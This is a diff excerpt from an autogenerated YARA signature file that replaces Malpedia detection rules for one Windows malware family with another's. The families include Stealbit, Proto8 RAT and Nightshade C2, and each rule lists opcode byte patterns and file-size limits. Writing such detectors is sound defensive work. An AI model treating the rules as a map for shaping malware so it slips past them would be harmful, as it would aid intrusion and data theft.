+		$sequence_5 = { b801000000 833d????????00 0f8516710000 ba05000000 8d0dd0185a00 e8???????? 5a }
+		$sequence_6 = { ffb3780b0000 8d4d80 6a00 6a00 56 50 e8???????? }
+		$sequence_7 = { 8bc7 8b55cc 83c2f0 f00fc1420c 48 85c0 7f08 }
+		$sequence_8 = { 84c0 75f9 2bce 51 52 e8???????? 6a00 }
+		$sequence_9 = { e9???????? 8d8de0fcffff e9???????? 8d8de8fcffff e9???????? 8d8d00fdffff e9???????? }
 
 	condition:
-		7 of them and filesize < 796672
+		7 of them and filesize < 4315136
 }
-rule MALPEDIA_Win_Wmighost_Auto : FILE
+rule MALPEDIA_Win_Merdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55e49921-45ae-5b90-8672-392197d5c46d"
+		id = "840879eb-651f-58a0-a9dd-c8bbbd75be85"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wmighost_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.merdoor_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "baccfa7c7ba02590525c187cca262206672accd6710804ff2657e35b11ab051c"
+		logic_hash = "6ad90da4b59952ca06b1d837955ca9f12c104be55324a03e7aaa640c9c01019a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117733,32 +117757,32 @@ rule MALPEDIA_Win_Wmighost_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff5238 8945fc 837dfc00 7d12 }
-		$sequence_1 = { 8b95f8feffff 52 ff15???????? 83c410 8b85f8feffff 50 }
-		$sequence_2 = { 8d95f0fcffff 52 ff15???????? 68e8030000 ff15???????? }
-		$sequence_3 = { c745fcffffffff 8d4de8 e8???????? e9???????? 51 8bcc 8965c4 }
-		$sequence_4 = { 8bc8 e8???????? 6aff 8d4de8 e8???????? }
-		$sequence_5 = { 50 64892500000000 83ec08 894dec c745fc00000000 8d4d08 e8???????? }
-		$sequence_6 = { ff15???????? e9???????? c745fcffffffff 8d4d84 e8???????? }
-		$sequence_7 = { 6a44 6a00 8d45b0 50 e8???????? }
-		$sequence_8 = { 894dfc 8b45fc 50 ff15???????? 8b45fc 8be5 5d }
-		$sequence_9 = { 6a00 6a00 ff15???????? 6a17 6a00 68???????? }
+		$sequence_0 = { 41 0fb7c0 47 663102 83c202 6683f908 72cf }
+		$sequence_1 = { e8???????? 83c40c 8934fd78f30110 eb07 56 e8???????? 59 }
+		$sequence_2 = { 5d c20400 c7875404000001000000 8b07 }
+		$sequence_3 = { 8d4590 50 8d45a4 50 ff15???????? }
+		$sequence_4 = { 75f9 2bca 51 8d85acfeffff 50 8d8d7cfcffff e8???????? }
+		$sequence_5 = { b91a000000 f7f9 80c261 eb10 e8???????? 99 }
+		$sequence_6 = { e8???????? 8987e4020000 c645fc02 8d55c0 b8fe000000 c745c0a3008d00 33c9 }
+		$sequence_7 = { 8dbb78030000 c785dcfdffff01000000 7204 8b07 eb02 8bc7 }
+		$sequence_8 = { e8???????? 8987e4020000 c645fc02 8d55c0 b8fe000000 c745c0a3008d00 }
+		$sequence_9 = { 8b7310 8d4310 8b11 51 50 8d4508 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 307200
 }
-rule MALPEDIA_Win_Stealbit_Auto : FILE
+rule MALPEDIA_Win_Redpepper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5dce69d0-a61c-561d-bb3f-783619cef52d"
+		id = "d2edfb9a-1eb5-5a85-952d-b05e4e2a71cd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealbit_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redpepper_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "90bb65634be35c442101bb71a7db5f26606dba88a1c52cacba38d15f6d5908ea"
+		logic_hash = "e96cef7dbcd0aadec344d24829840e1785ca6a9324f588db92d46f4ddb824ac9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117772,32 +117796,32 @@ rule MALPEDIA_Win_Stealbit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66899528feffff 6689bd30feffff 66899d38feffff 6689bd3efeffff 6689bd42feffff 66894dbc 66895dc0 }
-		$sequence_1 = { 0f8544010000 6a07 5b 53 8d45bc 8bd6 }
-		$sequence_2 = { 8bc2 5d c20400 8bd1 8b0a e8???????? 8bc8 }
-		$sequence_3 = { 8d47f1 c745f877caeb85 03c3 bf28442324 8365fc00 be4f86c861 }
-		$sequence_4 = { 2ac8 8ac1 5d c20400 55 8bec }
-		$sequence_5 = { 88460d 57 886e0e 884e0f 6a25 885610 e8???????? }
-		$sequence_6 = { 8b450c 48 83e801 740e 83e801 750f 8b4508 }
-		$sequence_7 = { 33c0 66898518ffffff 58 6a74 66898506ffffff 6689b540ffffff }
-		$sequence_8 = { 8945f8 e8???????? 03c0 8bce 8bd0 e8???????? 6a0c }
-		$sequence_9 = { 6a20 66899524ffffff 6689952effffff 5a 6a6e 58 6a6d }
+		$sequence_0 = { 68???????? 6a15 8d562c 6aff }
+		$sequence_1 = { 8b500c 41 83f904 8b12 8a540aff }
+		$sequence_2 = { 7405 e8???????? 8bc7 5f c9 }
+		$sequence_3 = { 8b460c 85c0 7432 8b442420 }
+		$sequence_4 = { 8b450c 2bc7 50 8d041f }
+		$sequence_5 = { 6a01 8bcf 8bd8 e8???????? ff75fc }
+		$sequence_6 = { 6a65 6a20 e8???????? 83c428 8bc5 }
+		$sequence_7 = { 3c0a 741e 8365f800 3c0d 7503 895df8 3b750c }
+		$sequence_8 = { 83c404 85c0 7411 8b4c2418 5f }
+		$sequence_9 = { 8d85b4feffff 50 56 ff15???????? 56 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 2482176
 }
-rule MALPEDIA_Win_Mistcloak_Auto : FILE
+rule MALPEDIA_Win_Rc2Fm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bcb29aaa-c37e-5c55-be1e-5d06aa41cabd"
+		id = "c250c949-1a89-5be3-9c88-097a9b8f6b70"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mistcloak_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rc2fm_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "6962ced189f702e03fc18d236cee46a2a0844476537e8c819ea6f1c43f9c0922"
+		logic_hash = "986b120a9f724a13ca09bdf0fceb457439c7912247f9f7f547406d208ddfc0d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117811,32 +117835,32 @@ rule MALPEDIA_Win_Mistcloak_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b049590500110 f644082801 740b 56 e8???????? 59 8bf0 }
-		$sequence_1 = { 660f282d???????? 660f59f5 660f28aa70100110 660f54e5 660f58fe 660f58fc }
-		$sequence_2 = { 8b0c8590500110 8b45f8 807c012800 7d46 }
-		$sequence_3 = { 0f85b1000000 8b4508 dd00 ebc2 c745e418120110 eb19 }
-		$sequence_4 = { 6bc618 57 8db8104e0110 57 }
-		$sequence_5 = { 7429 83e805 7415 83e801 0f8595010000 c745e408120110 }
-		$sequence_6 = { c745e408120110 e9???????? c745e404120110 e9???????? 894de0 c745e404120110 e9???????? }
-		$sequence_7 = { 85f6 7420 6bc618 57 8db8104e0110 57 }
-		$sequence_8 = { 8bc1 3914c5781a0110 7408 40 }
-		$sequence_9 = { 8b45b4 8b0c8590500110 8a043b 03ce 8b75dc 03cb 43 }
+		$sequence_0 = { 4885c0 7431 8b542420 488b4c2428 4533c0 e8???????? 448b442420 }
+		$sequence_1 = { 8bc1 d1e9 83e001 418b0481 33c1 3305???????? 33d2 }
+		$sequence_2 = { 48c1e004 4c89642430 4803c1 4889442438 }
+		$sequence_3 = { 33d2 ff15???????? 488b0d???????? ff15???????? e9???????? 40b70d e9???????? }
+		$sequence_4 = { 0f8736080000 4883791000 0f842b080000 48833900 750a 83790800 0f851b080000 }
+		$sequence_5 = { 41b804000000 488bc8 4889742470 4032ed 48c744242000000000 ff15???????? 85c0 }
+		$sequence_6 = { ff5010 eb62 448bc0 ba03000700 b900000100 e8???????? }
+		$sequence_7 = { ff90a8000000 85c0 792c 448bc0 ba07000a00 b903000100 e8???????? }
+		$sequence_8 = { 5e c3 ff15???????? ba06000600 b911000100 448bc0 e8???????? }
+		$sequence_9 = { 0f8781010000 83fd09 0f8778010000 448b642478 4183fc04 0f8769010000 488b4938 }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 410624
 }
-rule MALPEDIA_Win_Curlback_Auto : FILE
+rule MALPEDIA_Win_Icexloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "92c5ff94-7733-554e-9411-adf2e04e8882"
+		id = "9728ecc3-5098-572d-97ec-dd9f0ce4c650"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.curlback"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.curlback_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icexloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icexloader_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "5762a9ce8640933ae705745a803bbe43e75d1e28f524d7c7dfbc6bececc7a9c4"
+		logic_hash = "b722e25be5e83e6d5656f0c81a7b7a7da3a63f2b0bd49196ee8eb2c89a1c5431"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117850,32 +117874,32 @@ rule MALPEDIA_Win_Curlback_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 84c0 7420 488d153ac20c00 488bcb e8???????? eb0f }
-		$sequence_1 = { ba15000000 488bce e8???????? eb4c 488b5318 488bc8 e8???????? }
-		$sequence_2 = { 8bd8 85c0 752e 488b97a8080000 488d8f08130000 e8???????? 8bd8 }
-		$sequence_3 = { 85c0 7848 488b4550 488b08 488b5958 498bd6 488d8d88000000 }
-		$sequence_4 = { 7527 488b4c2460 4c8bc5 e8???????? 85c0 7516 488d15ac050b00 }
-		$sequence_5 = { 4883c908 498bc7 48894c2470 0fb6d1 48894590 eb14 b8f7ffffff }
-		$sequence_6 = { baffff0000 e8???????? 48899ec8010000 33c0 8983ac1c0000 488bce }
-		$sequence_7 = { e8???????? 894340 83f80d 742a 83f80b 0f8562050000 498bce }
-		$sequence_8 = { eb11 488b4308 488b08 48894ddf eb04 4c897def 48895db7 }
-		$sequence_9 = { 80bd2d13000000 7513 488bcd 85db 0f84a1000000 488bd3 e8???????? }
+		$sequence_0 = { ffd7 890424 ffd6 c744240400800000 890424 ffd3 83c41c }
+		$sequence_1 = { 807de47e 0fb6d8 0f85d9000000 eb53 8b1e 83eb05 39da }
+		$sequence_2 = { c705????????04000000 c705????????04000000 66c705????????1503 c705????????00c64300 c705????????04000000 c705????????04000000 }
+		$sequence_3 = { e8???????? 85c0 7405 833800 7515 c70424???????? }
+		$sequence_4 = { 89d3 e8???????? 85c0 740f 837cd87800 7406 8d44d878 }
+		$sequence_5 = { 46 e8???????? 89da e8???????? ebc8 83c41c 5b }
+		$sequence_6 = { 8b00 85c0 7405 8b00 8945d4 c645db00 31ff }
+		$sequence_7 = { 89c6 e8???????? 8b55e4 895c2408 89f3 c744241c00000000 c744241800000000 }
+		$sequence_8 = { 8d4314 e8???????? 8d4310 e8???????? 58 89d9 5b }
+		$sequence_9 = { 89e5 83ec10 8b4508 83c014 8945fc 8b4508 8b4010 }
 
 	condition:
-		7 of them and filesize < 4027392
+		7 of them and filesize < 656384
 }
-rule MALPEDIA_Win_Oddjob_Auto : FILE
+rule MALPEDIA_Win_Proto8_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce6f270b-4df6-5ffb-b080-81b3ac10b32d"
+		id = "a653386d-0e84-5fa0-9e05-c0a8f9e5f3b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oddjob_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.proto8_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "1f224904baf5c3783236036cd0bf598b6b7ff28b5975f43a99b2c079a61b51a9"
+		logic_hash = "e04ff586ad60efc989beb40a085354d9626a8059dbb86884929c6e4aa752aeb0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117889,32 +117913,32 @@ rule MALPEDIA_Win_Oddjob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 399da494ffff 7520 399d9c94ffff 7418 8bb59c94ffff 8b06 56 }
-		$sequence_1 = { c6856affffff51 c6856bffffff8b c6856cffffff56 c6856dffffff14 }
-		$sequence_2 = { 888592fcffff c68593fcffff53 c68594fcffff3e c68595fcffff5b }
-		$sequence_3 = { 8d85fefdffff 57 50 c785ccf7ffff01000000 89bdc0f7ffff e8???????? }
-		$sequence_4 = { 8b7d08 57 8bcb e8???????? 57 8945e0 897d08 }
-		$sequence_5 = { 0f844c080000 663d7800 0f8442080000 663d5800 0f8438080000 83a598fbffff00 8bb5dcfbffff }
-		$sequence_6 = { 889dd3feffff 889dd4feffff 889dd5feffff c685d6feffff56 }
-		$sequence_7 = { f7f7 8b4508 8a0401 32c2 88040e 41 8955fc }
-		$sequence_8 = { c68558fcffff8b c68559fcffff76 c6855afcffff10 c6855bfcffff01 c6855cfcffffc3 c6855dfcffff53 }
-		$sequence_9 = { 83cfff f7f7 8b4508 8a0401 32c2 88040e }
+		$sequence_0 = { 8b5a10 8b4210 83c308 83e3fa a801 7421 8b4210 }
+		$sequence_1 = { ba80000000 e8???????? c70302000000 4c8b8320010000 488d4318 488b9328010000 33f6 }
+		$sequence_2 = { 837c244801 0f8595000000 488b6c2458 8b7b30 488b4b48 488b01 ff5008 }
+		$sequence_3 = { 7468 3bca 8bc1 0f46c2 ffc0 4103c0 3bf0 }
+		$sequence_4 = { 89531c 48873cc8 4885ff 7506 8d4201 89431c 40f6c701 }
+		$sequence_5 = { e8???????? 448bf0 e9???????? 4c8b86a8000000 488d8e88000000 488b96b0000000 4d8bcd }
+		$sequence_6 = { 7636 66660f1f840000000000 8bc8 48c1e106 428b541124 85d2 }
+		$sequence_7 = { 8b8b64810100 897dd4 897de4 897df4 488b8378810100 488d55b0 }
+		$sequence_8 = { 83e801 7455 83e801 743d 83e801 740a 83f801 }
+		$sequence_9 = { 8b4318 3bc8 0f8e96000000 488b4b38 48894c2450 e8???????? }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 2537472
 }
-rule MALPEDIA_Win_Swen_Auto : FILE
+rule MALPEDIA_Win_Unidentified_074_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01c07f06-713c-58de-abb2-d741b6b7f019"
+		id = "0e88fd75-1316-5da0-a27c-d979440b0d1c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.swen_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_074_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "c23034223b381f25ac775fe21bfc90a4b7d7644747556b010494835d089cdb6c"
+		logic_hash = "efaf1ffd6b205d550b6e92c44f0056ae88e73af2fe4605531aaeb9c3b3bf90af"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117928,34 +117952,34 @@ rule MALPEDIA_Win_Swen_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 8d85e0fdffff 50 e8???????? 59 59 53 }
-		$sequence_1 = { 895dfc 68c8000000 53 68???????? e8???????? 83c40c 891d???????? }
-		$sequence_2 = { 8d8564ffffff eb03 8d45c8 50 8d8540feffff 50 e8???????? }
-		$sequence_3 = { 85c0 740a e8???????? e9???????? 8d85bcfcffff 50 }
-		$sequence_4 = { 0f84f8020000 8d7801 803f79 750a c78574feffff01000000 8818 8d8581feffff }
-		$sequence_5 = { 85c0 0f85ccfdffff 6820bf0200 e8???????? 59 8bf8 89bd1cfeffff }
-		$sequence_6 = { 83c40c 85c0 750c 834dfcff 6a01 58 e9???????? }
-		$sequence_7 = { 680000aa00 ff15???????? 8945d0 6a08 ff15???????? 50 ff75a8 }
-		$sequence_8 = { 57 6a01 68???????? bb???????? 53 bf02000080 57 }
-		$sequence_9 = { 7456 6a02 53 53 57 ff15???????? ff7508 }
+		$sequence_0 = { 8b4d0c 3bf1 752a 8b4614 83f808 7204 }
+		$sequence_1 = { 83f808 720d 40 50 ffb528e7ffff e8???????? }
+		$sequence_2 = { 8d8528e7ffff 50 8d8570e7ffff 50 8d85f8e6ffff 50 }
+		$sequence_3 = { 75f3 8bcf e8???????? 3bd0 }
+		$sequence_4 = { 8855ee 660f1f440000 0fb64435ec 50 51 }
+		$sequence_5 = { 33d2 8b4f10 33f6 c740140f000000 83781410 894ddc 8955e0 }
+		$sequence_6 = { 6800040000 8985f8f7ffff 8901 8d85fcfbffff }
+		$sequence_7 = { 8b85e0f7ffff 85c0 7407 50 ff15???????? 85ff }
+		$sequence_8 = { 8d4618 7202 8b00 837e1410 7202 8b36 6a00 }
+		$sequence_9 = { 8b853ce7ffff 83f808 720d 40 50 ffb528e7ffff }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Badnews_Auto : FILE
+rule MALPEDIA_Win_Nightshade_C2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "669fd264-b6d6-5d6c-8250-2eaeef7607f8"
+		id = "506408db-305c-5339-b348-c82ff40c922a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badnews_auto.yar#L1-L205"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightshade_c2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightshade_c2_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "70dca6886c221c9bfe5fe7481db4825e4f99d418a6f0f0b45196e36a94b37f92"
+		logic_hash = "73549f59f11fbc1afdb3ccb5b45ff5a2e04bde2ab7c3c97f1567af6c297191aa"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117967,43 +117991,32 @@ rule MALPEDIA_Win_Badnews_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 50 e8???????? 83c404 68???????? 6804010000 }
-		$sequence_1 = { c0e004 02c1 3423 c0c003 }
-		$sequence_2 = { c78534ffffff47657457 c78538ffffff696e646f c7853cffffff77546578 66c78540ffffff7457 }
-		$sequence_3 = { c705????????33322e64 66c705????????6c6c c605????????00 ff15???????? }
-		$sequence_4 = { a1???????? 33c5 8945fc 53 56 57 8d8534ffffff }
-		$sequence_5 = { eb02 33c9 c0e004 02c1 }
-		$sequence_6 = { 55 8bec 8b450c 3d01020000 }
-		$sequence_7 = { 68???????? 6a1a 68???????? 57 }
-		$sequence_8 = { 6a00 d1f9 68???????? 03c9 }
-		$sequence_9 = { 57 6a00 6880000000 6a04 6a00 6a01 6a04 }
-		$sequence_10 = { ffd3 85c0 7403 83c608 8a06 }
-		$sequence_11 = { ff15???????? 85c0 7405 83c004 }
-		$sequence_12 = { 68???????? ff15???????? b8???????? 83c424 8d5002 668b08 }
-		$sequence_13 = { 41 84c0 75f9 2bce 3bd1 72e4 }
-		$sequence_14 = { 8bc7 c1f805 83e71f c1e706 8b0485d0a70110 }
-		$sequence_15 = { 4b 75da 8b35???????? 8b9d50fbffff }
-		$sequence_16 = { 8bce 83e11f c1e106 8b0485d0a70110 c644080401 56 e8???????? }
-		$sequence_17 = { 6a03 8802 42 8b048dd0a70110 4e 5f 6a0a }
-		$sequence_18 = { c1e106 899528e5ffff 53 8b1495d0a70110 }
-		$sequence_19 = { 84c0 75f9 2bce 741c 804415ec03 8d4dec 42 }
-		$sequence_20 = { c7465c00350110 83660800 33ff 47 897e14 }
+		$sequence_0 = { c744243000000000 488b842438010000 4889442428 89542420 448bcf 4533c0 33d2 }
+		$sequence_1 = { c744242000000000 eb0b 8b442420 83c002 89442420 8b842480000000 39442420 }
+		$sequence_2 = { 488b4c2458 ff15???????? 90 48837c247000 740c 488b4c2470 ff15???????? }
+		$sequence_3 = { 8b442458 89442428 488b442460 4889442420 448b4c2454 4c8b442470 33d2 }
+		$sequence_4 = { 8b0c24 486bc903 488b542408 0fb60c0a 81e1ff000000 0bc1 8b0c24 }
+		$sequence_5 = { ff15???????? ff15???????? 90 488b442440 488bc8 e8???????? 90 }
+		$sequence_6 = { 48638424b8000000 488b8c24b0000000 4803c8 488bc1 4889442430 c744244400000000 eb0b }
+		$sequence_7 = { 85c0 7479 488b542438 488d0d0ce50100 e8???????? 85c0 }
+		$sequence_8 = { ff15???????? 85c0 7505 e9???????? 41b810000000 488d9424b8000000 488b4c2448 }
+		$sequence_9 = { 8b442424 8b4c2460 2bc8 8bc1 3dffff0000 7e0a c7442420ffff0000 }
 
 	condition:
-		7 of them and filesize < 612352
+		7 of them and filesize < 458752
 }
-rule MALPEDIA_Win_Zitmo_Auto : FILE
+rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "abf7d489-428c-576b-bf50-6d5176838935"
+		id = "b2070620-d9f7-5811-b76d-80baf53d08b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zitmo_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vigilant_cleaner_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "af492533d6f46a2ad9ae3961738d77dc030c3e8231bbc6ee80a9ef330be7fcfa"
+		logic_hash = "7e320a52ca8b714b97d83c5af01f55040082927d0e7ca8657f050cb83fb7182e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118017,32 +118030,32 @@ rule MALPEDIA_Win_Zitmo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 23cb 8bd6 ff75a0 e8???????? }
-		$sequence_1 = { 55 8bec 81c434ffffff f7df 8bf0 49 }
-		$sequence_2 = { 8175b437340000 23f9 f7d1 03d7 f7d2 }
-		$sequence_3 = { 4b f7de c745bc36343335 03c3 f7da f7d1 }
-		$sequence_4 = { ffb584feffff 56 e8???????? ffb574ffffff }
-		$sequence_5 = { f7df 894da8 8955d0 ffb560feffff e8???????? c9 }
-		$sequence_6 = { f7d7 ff45b4 8bcf f7d6 03fa 8d9568ffffff }
-		$sequence_7 = { 81759437320000 3145b8 41 23c6 }
-		$sequence_8 = { 42 4e f7df 03d7 48 40 }
-		$sequence_9 = { 23cb 4a f7d0 8955c4 c9 c20c00 55 }
+		$sequence_0 = { 53 b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
+		$sequence_1 = { ed 5b 59 5a }
+		$sequence_2 = { b90a000000 ba58560000 ed 5b 59 }
+		$sequence_3 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b 59 }
+		$sequence_4 = { bb00000000 b90a000000 ba58560000 ed 5b }
+		$sequence_5 = { b90a000000 ba58560000 ed 5b 59 5a }
+		$sequence_6 = { ba58560000 ed 5b 59 }
+		$sequence_7 = { ba58560000 ed 5b 59 5a }
+		$sequence_8 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b }
+		$sequence_9 = { bb00000000 b90a000000 ba58560000 ed 5b 59 }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 1181696
 }
-rule MALPEDIA_Win_Diztakun_Auto : FILE
+rule MALPEDIA_Win_Ntospy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "438551c7-604a-5ad2-954a-f3ff63f3cb31"
+		id = "8131d4ba-7ab9-5f25-bfe1-80fb81c429a4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.diztakun_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ntospy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ntospy_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "fc2cd18a0fc5853e5904a0ff7267816d8fa89853fb1e9c46e2210edfcdfdf3de"
+		logic_hash = "8fbd4c5ffc79f2d95a93b5deb7321b5b82d08f35463db086df64bd3e92a52647"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118056,32 +118069,32 @@ rule MALPEDIA_Win_Diztakun_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7f05 b8???????? e8???????? 8b4c2444 8b5c2428 8b6c2430 }
-		$sequence_1 = { 53 e8???????? cc 5a 58 }
-		$sequence_2 = { 7d0c 57 8bcb e8???????? 8b542418 8b0b 3bf5 }
-		$sequence_3 = { e9???????? 8b451c 83c0c7 56 83f80b 0f87c4000000 ff2485ffff4000 }
-		$sequence_4 = { 7574 8b4008 3bc6 746d 663930 7468 8b5808 }
-		$sequence_5 = { 50 8d84241c020000 64a300000000 8b84242c020000 6a00 6a00 8d4c2420 }
-		$sequence_6 = { ff15???????? 83c6f0 56 e8???????? 8b7c2418 83c010 8907 }
-		$sequence_7 = { 89642418 8bfc 50 e8???????? 83c010 83c404 8907 }
-		$sequence_8 = { 8b8254010000 83c404 8bcb ffd0 }
-		$sequence_9 = { 8bd9 895c2414 c744241000000000 e8???????? 33c9 85c0 0f95c1 }
+		$sequence_0 = { 5f c3 48897c2408 488d3dacf90000 }
+		$sequence_1 = { eb74 85c9 7858 3b15???????? 7350 488bca 4c8d05e5b40000 }
+		$sequence_2 = { 8bfa 4c8d0d5d740000 488bd9 488d1553740000 b916000000 4c8d053f740000 e8???????? }
+		$sequence_3 = { b808000000 486bc000 488d0deaad0000 48c7040102000000 b808000000 }
+		$sequence_4 = { 48890d???????? 488d0512f50000 488d0d3bf70000 488905???????? 48890d???????? e8???????? }
+		$sequence_5 = { 4c8d0578760000 488d15016d0000 e8???????? 4885c0 740f 488bcb }
+		$sequence_6 = { f20f1000 8b5808 e9???????? 488d05dfc70000 4a8b0ce8 }
